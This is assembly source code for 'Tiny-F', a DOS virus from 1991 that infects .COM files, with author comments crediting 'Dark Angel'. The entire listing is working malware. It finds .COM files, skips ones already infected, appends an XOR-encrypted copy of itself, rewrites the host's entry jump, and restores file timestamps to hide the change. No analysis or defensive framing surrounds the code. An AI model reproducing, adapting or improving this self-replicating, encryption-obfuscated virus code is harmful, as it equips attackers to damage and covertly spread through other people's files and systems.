tinyv SEGMENT BYTE PUBLIC 'code'
|
|||
|
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
|
|||
|
|
|||
|
ORG 100h
|
|||
|
|
|||
|
DOS EQU 21h
|
|||
|
|
|||
|
start: JMP pgstart
|
|||
|
exlbl: db 0CDh, 20h, 7, 8, 9
|
|||
|
pgstart:CALL tinyvir
|
|||
|
tinyvir:
|
|||
|
POP SI ; get SI for storage
|
|||
|
SUB SI,offset tinyvir ; reset SI to virus start
|
|||
|
MOV BP,[SI+blnkdat] ; store SI in BP for return
|
|||
|
ADD BP, OFFSET exlbl
|
|||
|
CALL endecrpt
|
|||
|
JMP SHORT realprog
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; nonencrypted subroutines start here
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
; PCM's encryption was stupid, mine is better - Dark Angel
|
|||
|
endecrpt:
|
|||
|
; Only need to save necessary registers - Dark Angel
|
|||
|
PUSH AX ; store registers
|
|||
|
PUSH BX
|
|||
|
PUSH CX
|
|||
|
PUSH SI
|
|||
|
; New, better, more compact encryption engine
|
|||
|
MOV BX, [SI+EN_VAL]
|
|||
|
ADD SI, offset realprog
|
|||
|
MOV CX, endenc - realprog
|
|||
|
SHR CX, 1
|
|||
|
JNC start_encryption
|
|||
|
DEC SI
|
|||
|
start_encryption:
|
|||
|
MOV DI, SI
|
|||
|
encloop:
|
|||
|
LODSW ; DS:[SI] -> AX
|
|||
|
XOR AX, BX
|
|||
|
STOSW
|
|||
|
LOOP encloop
|
|||
|
|
|||
|
POP SI ; restore registers
|
|||
|
POP CX
|
|||
|
POP BX
|
|||
|
POP AX
|
|||
|
RET
|
|||
|
;-----end of encryption routine
|
|||
|
nfect:
|
|||
|
CALL endecrpt
|
|||
|
MOV [SI+offset endprog+3],AX; point to data
|
|||
|
MOV AH,40H ; write instruction
|
|||
|
LEA DX,[SI+0105H] ; write buffer loc |
|
|||
|
MOV CX,offset endprog-105h ; (size of virus) --\|/--
|
|||
|
INT DOS ; do it!
|
|||
|
PUSHF
|
|||
|
CALL endecrpt
|
|||
|
POPF
|
|||
|
JC outa1 ; error, bug out
|
|||
|
RET
|
|||
|
outa1:
|
|||
|
JMP exit
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Unencrypted routines end here
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
realprog:
|
|||
|
CLD ; forward direction for string ops
|
|||
|
; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
|
|||
|
; Instead, set DTA to SI+ENDPROG+131h
|
|||
|
MOV AH, 1Ah ; Set DTA
|
|||
|
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
|
|||
|
INT 21h
|
|||
|
|
|||
|
LEA DX,[SI+fspec] ; get filespec (*.COM)
|
|||
|
XOR CX, CX ; || (clear regs)
|
|||
|
MOV AH,4EH ; || (find files)
|
|||
|
mainloop: ; \||/
|
|||
|
INT DOS ; ----\/----
|
|||
|
JC hiccup ; no more files found, terminate virus
|
|||
|
; Next part had to be changed to account for new DTA address - Dark Angel
|
|||
|
LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
|
|||
|
; (offset 30 is DTA filename start)
|
|||
|
MOV AX,3D02H ; open file
|
|||
|
INT DOS ; do it!
|
|||
|
MOV BX,AX ; move file handle to BX
|
|||
|
MOV AH,3FH ; read file
|
|||
|
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
|
|||
|
MOV DI,DX ; set Dest Index to area for buffer
|
|||
|
MOV CX,0003H ; read 3 bytes
|
|||
|
INT DOS ; do it!
|
|||
|
CMP BYTE PTR [DI],0E9H ; check for JMP at start
|
|||
|
JE infect ; If begins w/JMP, Infect
|
|||
|
nextfile:
|
|||
|
MOV AH,4FH ; set int 21 to find next file
|
|||
|
JMP mainloop ; next file, do it!
|
|||
|
hiccup: JMP exit
|
|||
|
infect:
|
|||
|
MOV AX,5700h ; get date function
|
|||
|
INT DOS ; do it!
|
|||
|
PUSH DX ; store date + time
|
|||
|
PUSH CX
|
|||
|
MOV DX,[DI+01H] ; set # of bytes to move
|
|||
|
MOV [SI+blnkdat],DX ; " " " " " "
|
|||
|
; Tighter Code here - Dark Angel
|
|||
|
XOR CX,CX ; " " " " " " (0 here)
|
|||
|
MOV AX,4200H ; move file
|
|||
|
INT DOS ; do it!
|
|||
|
MOV DX,DI ; set dest index to area for buffer
|
|||
|
MOV CX,0002H ; two bytes
|
|||
|
MOV AH,3FH ; read file
|
|||
|
INT DOS ; do it!
|
|||
|
CMP WORD PTR [DI],0807H ; check for infection
|
|||
|
JE nextfile ; next file if infected
|
|||
|
getaval: ; encryption routine starts here
|
|||
|
; My modifications here - Dark Angel
|
|||
|
MOV AH, 2Ch ; DOS get TIME function
|
|||
|
INT DOS ; do it!
|
|||
|
OR DX, DX ; Is it 0?
|
|||
|
JE getaval ; yeah, try again
|
|||
|
MOV word ptr [si+offset en_val], DX ; Store it
|
|||
|
; Tighter code here - Dark Angel
|
|||
|
XOR DX,DX ; clear regs
|
|||
|
XOR CX,CX ; " "
|
|||
|
MOV AX,4202H ; move file pointer
|
|||
|
INT DOS ; do it!
|
|||
|
OR DX,DX ; new pointer location 0?
|
|||
|
JNE nextfile ; if no then next file
|
|||
|
CMP AH,0FEH ; new pointer loc too high?
|
|||
|
JNC nextfile ; yes, try again
|
|||
|
CALL nfect
|
|||
|
MOV AX,4200H ; move pointer
|
|||
|
XOR CX, CX ; clear reg
|
|||
|
MOV DX,OFFSET 00001 ; where to set pointer
|
|||
|
INT DOS ; do it!
|
|||
|
MOV AH,40H ; write to file
|
|||
|
LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
|
|||
|
MOV CX,0002H ; two bytes (the JMP)
|
|||
|
INT DOS ; do it!
|
|||
|
MOV AX,5701h ; store date
|
|||
|
POP CX ; restore time
|
|||
|
POP DX ; restore date
|
|||
|
INT DOS ; do it!
|
|||
|
exit:
|
|||
|
MOV AH,3EH ; close file
|
|||
|
INT DOS ; do it!
|
|||
|
|
|||
|
; Return DTA to old position - Dark Angel
|
|||
|
|
|||
|
MOV AH, 1Ah ; Set DTA
|
|||
|
MOV DX, 80h ; to PSP DTA
|
|||
|
INT 21h
|
|||
|
|
|||
|
JMP BP
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; encrypted data goes here
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
fspec LABEL WORD
|
|||
|
DB '*.COM',0
|
|||
|
nondata DB 'Tiny-F version 1.1' ; Program identification
|
|||
|
DB '<15><><EFBFBD>@&<><EEB7B3>' ; author identification
|
|||
|
DB 'Released 10-19-91' ; release date
|
|||
|
endenc LABEL BYTE ; end of encryption zone
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; nonencrypted data goes anywhere after here
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
blnkdat LABEL WORD
|
|||
|
DW 0000H
|
|||
|
|
|||
|
; Only en_val is needed now because of new encryption mechanism
|
|||
|
en_val DW 0h
|
|||
|
|
|||
|
endprog LABEL WORD
|
|||
|
tinyv ENDS
|
|||
|
END start